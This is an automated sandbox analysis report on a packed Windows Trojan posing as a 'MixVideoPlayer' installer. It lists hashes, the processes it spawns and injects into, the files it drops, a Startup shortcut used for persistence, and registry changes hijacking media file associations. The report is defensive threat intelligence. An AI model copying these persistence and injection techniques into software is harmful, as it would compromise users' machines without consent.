MD5: 2b23c515d40265fac88d0a61fd32755e
SHA1: 5469c0e96b2a2bb711521b6f2a96cfe75a64537e
SHA256: 53e29cf8bdabddda9705d12067443d05df0efcd0db42ef82c08eaaf631ad2781
SSDeep: 12288:Al/NiIoYAbvZO7wNJgHO78VN4zN8EMDOVUjW3Xg8oSABBq:AZjoY4EEyHWqN6KjzbPq
Size: 561976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-03-26 15:49:32
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mixvideoplayersetup.exe:1192
WPFFontCache_v0400.exe:3016
DeleteTasks.exe:2364
LTV2.exe:2108
LTV2.exe:2468
LTV2.exe:1012

The Trojan injects its code into the following process(es):

MixVideoPlayer.exe:2876
%original file name%.exe:1896
BrowserWeb.exe:2452

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mixvideoplayersetup.exe:1192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\MixVideoPlayer\Languages\ChineseT.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Swedish.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Danish.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Hungarian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Estonian.ini (3 bytes)
%Program Files%\MixVideoPlayer\dotNetFx40_Full_setup.exe (30344 bytes)
%Program Files%\MixVideoPlayer\Languages\Slovak.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\NSISdl.dll (15 bytes)
%Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.config (377 bytes)
%Program Files%\MixVideoPlayer\BrowserWeb.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\MixVideoPlayer\references\libreria.png (244 bytes)
%Program Files%\MixVideoPlayer\Languages\Norwegian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\German.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\PhotoLoader.dll (784 bytes)
%Program Files%\MixVideoPlayer\Languages\Slovenian.ini (3 bytes)
%Program Files%\MixVideoPlayer\PhotoLoader.dll (784 bytes)
%Program Files%\MixVideoPlayer\Languages\Czech.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\mixChecker.exe (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\AccessControl.dll (15 bytes)
%Program Files%\MixVideoPlayer\Languages\Polish.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp (4 bytes)
%Program Files%\MixVideoPlayer\references\Interop.SHDocVw.dll (5064 bytes)
%Program Files%\MixVideoPlayer\Languages\Catalan.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\ChineseS.ini (3 bytes)
%Program Files%\MixVideoPlayer\mixvideoplayer.affcode (3 bytes)
%Program Files%\MixVideoPlayer\uninstall.exe (3865 bytes)
%Program Files%\MixVideoPlayer\icon.ico (12536 bytes)
%Program Files%\MixVideoPlayer\Languages\Thai.ini (5 bytes)
%Program Files%\MixVideoPlayer\references\extvideo.png (146 bytes)
%Program Files%\MixVideoPlayer\references\extaudio.png (310 bytes)
%Program Files%\MixVideoPlayer\Languages\Russian.ini (5 bytes)
%Program Files%\MixVideoPlayer\references\ffmpeg.zip (946650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\nsProcess.dll (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Bulgarian.ini (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Hindi.ini (6 bytes)
%Program Files%\MixVideoPlayer\Languages\Latvian.ini (3 bytes)
%Program Files%\MixVideoPlayer\NLog.dll (14184 bytes)
%Program Files%\MixVideoPlayer\Languages\Italian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Korean.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\French.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Romanian.ini (3 bytes)
%Program Files%\MixVideoPlayer\icon-uninstall.ico (3616 bytes)
%Program Files%\MixVideoPlayer\Languages\Vietnamese.ini (4 bytes)
%Program Files%\MixVideoPlayer\Newtonsoft.Json.dll (16944 bytes)
%Program Files%\MixVideoPlayer\references\taglib-sharp.dll (15536 bytes)
%Program Files%\MixVideoPlayer\FrameworkControl.exe (12024 bytes)
%Program Files%\MixVideoPlayer\references\Newtonsoft.Json.dll (15536 bytes)
%Program Files%\MixVideoPlayer\Languages\Indonesian.ini (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\Uninstall MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\HaitianCreole.ini (3 bytes)
%Program Files%\MixVideoPlayer\Windows\Thumbs.db (1856 bytes)
%Program Files%\MixVideoPlayer\Languages\Greek.ini (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Hebrew.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Finnish.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\NDde.dll (3616 bytes)
%Program Files%\MixVideoPlayer\taglib-sharp.dll (15536 bytes)
%Program Files%\MixVideoPlayer\mixUpdater.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2.tmp (183067 bytes)
%Program Files%\MixVideoPlayer\Snowplow.Tracker.dll (784 bytes)
%Program Files%\MixVideoPlayer\MixVideoPlayer.exe (82435 bytes)
%Program Files%\MixVideoPlayer\Languages\Japanese.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Portuguese.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (11 bytes)
%Program Files%\MixVideoPlayer\Sider.dll (5064 bytes)
%Program Files%\MixVideoPlayer\Windows\logopeq-icon.ico (9608 bytes)
%Program Files%\MixVideoPlayer\LTV2.exe (6 bytes)
%Program Files%\MixVideoPlayer\Controls\ifishplayer-icon2.ico (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\ZipDLL.dll (6360 bytes)
%Program Files%\MixVideoPlayer\Languages\Ukrainian.ini (5 bytes)
%Program Files%\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll (8560 bytes)
%Program Files%\MixVideoPlayer\mixvideoplayer.uidnum (23 bytes)
%Program Files%\MixVideoPlayer\Languages\Arabic.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Turkish.ini (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\Dutch.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll (3 bytes)
%Program Files%\MixVideoPlayer\Languages\English.ini (3 bytes)
%Program Files%\MixVideoPlayer\Controls\Thumbs.db (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\WebBrowserMixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\Spanish.ini (3 bytes)
%Documents and Settings%\%current user%\Desktop\MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.config (377 bytes)
%Program Files%\MixVideoPlayer\DeleteTasks.exe (10 bytes)
%Program Files%\MixVideoPlayer\references\Thumbs.db (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Lithuanian.ini (3 bytes)
%Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.dll (3 bytes)
%Program Files%\MixVideoPlayer\LTVNetSdk.dll (14 bytes)
%Program Files%\MixVideoPlayer\references\folder.png (472 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\ZipDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp (0 bytes)

The process MixVideoPlayer.exe:2876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\show_ads[1].js (7 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[2].txt (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\log.txt (134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[1].js (2187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\MainBanner[1].htm (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[1].txt (637 bytes)
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\analytics[1].js (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\show_ads[1].js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\arw[1].png (342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery.min[1].js (3155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\analytics[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[2].txt (4225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[2].js (5043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[2].js (2239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\banner[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\config\config.ini (252 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (15900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[3].js (4562 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (3790 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\arw[1].png (342 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\24075845-11900215[1].png (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\show_ads[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[2].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[1].txt (0 bytes)
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\arw[1].png (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)

The process %original file name%.exe:1896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\loading-install[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\style[1].css (114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe (1792168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-download[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\loadingBar[1].gif (9823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\msjava[1].dll (465777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\progress-bar[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\style[1].css (5083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bullet-short[1].gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\99bf1249-796b-43b5-839f-99f7def784ae\mixvideoplayersetup.exe (1792168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\wbem\Logs\wbemprox.log (684 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5c9fcfb67b8b50caf3ff80fda5f90c17f2908cdc58dc8a332caa164c680aca4d3d2a2f887f13872573de854a95eea05b833f5cf0a0c8699f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\bf347a9c266220e0e770ae69b02713632b85a487869a70dd771b22fb58989f9aa3ebc8497ffa6be434bb903bf4e644ccef8f18175e98e50b[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\88e3cdf5a5346baa2b731227e7a325392c7d17c057f36ec1aa728dd48813418e75a639a1f3c174651b0f651572207b831c51a60cc8716716[1].txt (0 bytes)

Registry activity

The process mixvideoplayersetup.exe:1192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\mixp.flv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\.mp4]
"(Default)" = "mixp.mp4"

[HKCR\mixp.flv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.3gp\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\.mkv]
"(Default)" = "mixp.mkv"

[HKCR\mixp.aac]
"(Default)" = "mixp media file (.aac)"

[HKCR\.mpeg]
"(Default)" = "mixp.mpeg"

[HKCR\mixp.mkv\shell]
"(Default)" = "Play"

[HKCR\mixp.mkv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpeg\shell]
"(Default)" = "Play"

[HKCR\mixp.wmv]
"(Default)" = "mixp media file (.wmv)"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".3gp" = ""

[HKCR\.flv]
"(Default)" = "mixp.flv"

[HKCR\.wma]
"mixp.backup" = "WMAFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayVersion" = "v1.0.0.18"

[HKCR\.mpg]
"(Default)" = "mixp.mpg"

[HKCR\.mov]
"(Default)" = "mixp.mov"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\mixp.wmv\shell]
"(Default)" = "Play"

[HKCR\.avi]
"(Default)" = "mixp.avi"

[HKCR\mixp.mp4\shell]
"(Default)" = "Play"

[HKCR\mixp.3gp\shell]
"(Default)" = "Play"

[HKCR\mixp.mp3\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mov\shell]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\mixp.3gp\shell\Play]
"(Default)" = "Play"

[HKLM\SOFTWARE\MixVideoPlayer\MixVideoPlayer]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.divx]
"(Default)" = "mixp media file (.divx)"

[HKCR\mixp.mkv]
"(Default)" = "mixp media file (.mkv)"

[HKCR\.wma]
"(Default)" = "mixp.wma"

[HKCR\.aif]
"(Default)" = "mixp.aif"

[HKCR\mixp.avi\shell\Play]
"(Default)" = "Play"

[HKCR\.wav]
"mixp.backup" = "soundrec"

[HKCR\mixp.flv\shell]
"(Default)" = "Play"

[HKCR\.aif]
"mixp.backup" = "AIFFFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayIcon" = "%Program Files%\MixVideoPlayer\icon.ico"

[HKCR\mixp.mov\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.mpeg\shell\Play]
"(Default)" = "Play"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"Publisher" = "SoftForce LLC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayName" = "MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".AAC" = ""

[HKCR\mixp.aif\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.divx\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mp4\shell\Play]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mpeg" = ""

[HKCR\mixp.wmv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mov]
"(Default)" = "mixp media file (.mov)"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".aif" = ""

[HKCR\mixp.3gp]
"(Default)" = "mixp media file (.3gp)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Internet Explorer\Styles]
"MaxScriptStatements" = "4294967295"

[HKCR\mixp.mov\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\mixp.mpg]
"(Default)" = "mixp media file (.mpg)"

[HKCR\mixp.mp4\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpeg]
"(Default)" = "mixp media file (.mpeg)"

[HKCR\mixp.divx\shell\Play]
"(Default)" = "Play"

[HKCR\.wav]
"(Default)" = "mixp.wav"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".flv" = ""

[HKCR\mixp.avi]
"(Default)" = "mixp media file (.avi)"

[HKCR\mixp.wma]
"(Default)" = "mixp media file (.wma)"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 E2 1E E3 92 D8 67 D8 EA 71 56 C5 F7 22 19 79"

[HKCR\.divx]
"(Default)" = "mixp.divx"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".divx" = ""

[HKCR\mixp.mp4\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.avi\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".wma" = ""

[HKCR\Applications\MixVideoPlayer.exe]
"FriendlyAppName" = "MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mkv" = ""
".wmv" = ""

[HKCR\mixp.3gp\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "11001"

[HKCR\mixp.wav\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.wma\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.wmv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"EstimatedSize" = "19713"

[HKCR\mixp.wmv\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.aif\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mpg\shell\Play]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\mixp.mp3\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.avi\shell]
"(Default)" = "Play"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"UninstallString" = "%Program Files%\MixVideoPlayer\uninstall.exe"

[HKCR\mixp.mp4]
"(Default)" = "mixp media file (.mp4)"

[HKCR\Applications\MixVideoPlayer.exe]
"(Default)" = ""

[HKCR\mixp.mp3\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.aac\shell\Play]
"(Default)" = "Play"

[HKCR\.aac]
"(Default)" = "mixp.aac"

[HKCR\mixp.aif]
"(Default)" = "mixp media file (.aif)"

[HKCR\mixp.avi\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\mixp.mp3]
"(Default)" = "mixp media file (.mp3)"

[HKCR\.mp3]
"mixp.backup" = "mp3file"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".avi" = ""

[HKCR\.mpg]
"mixp.backup" = "mpegfile"

[HKCR\mixp.aif\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\Applications\MixVideoPlayer.exe\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.flv]
"(Default)" = "mixp media file (.flv)"

[HKCR\mixp.divx\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mkv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wav\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\mixp.aac\shell]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\mixp.aac\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpg\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wav\shell]
"(Default)" = "Play"

[HKCR\mixp.wav\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mkv\shell\Play]
"(Default)" = "Play"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mov" = ""

[HKCR\mixp.mpg\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mov\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".MP3" = ""

[HKLM\SOFTWARE\MixVideoPlayer\MixVideoPlayer]
"InstallDir" = "%Program Files%\MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mp4" = ""

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"BrowserWeb.exe" = "11001"

[HKCR\mixp.mpeg\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wma\shell]
"(Default)" = "Play"

[HKCR\.wmv]
"mixp.backup" = "WMVFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\mixp.aif\shell]
"(Default)" = "Play"

[HKCR\mixp.aac\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\mixp.flv\shell\Play]
"(Default)" = "Play"

[HKCR\.3gp]
"(Default)" = "mixp.3gp"

[HKCR\.avi]
"mixp.backup" = "avifile"

[HKCR\.wmv]
"(Default)" = "mixp.wmv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mpg" = ""

[HKCR\mixp.mpg\shell]
"(Default)" = "Play"

[HKCR\mixp.wma\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\.mp3]
"(Default)" = "mixp.mp3"

[HKCR\mixp.mpeg\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.wav]
"(Default)" = "mixp media file (.wav)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".WAV" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\mixp.divx\shell]
"(Default)" = "Play"

[HKCR\.mpeg]
"mixp.backup" = "mpegfile"

[HKCR\mixp.mp3\shell]
"(Default)" = "Play"

[HKCR\mixp.wma\shell\Play]
"(Default)" = "Play"

The process WPFFontCache_v0400.exe:3016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 0D 06 52 C4 91 4A 34 F2 9F 0F E9 46 7E C6 0F"

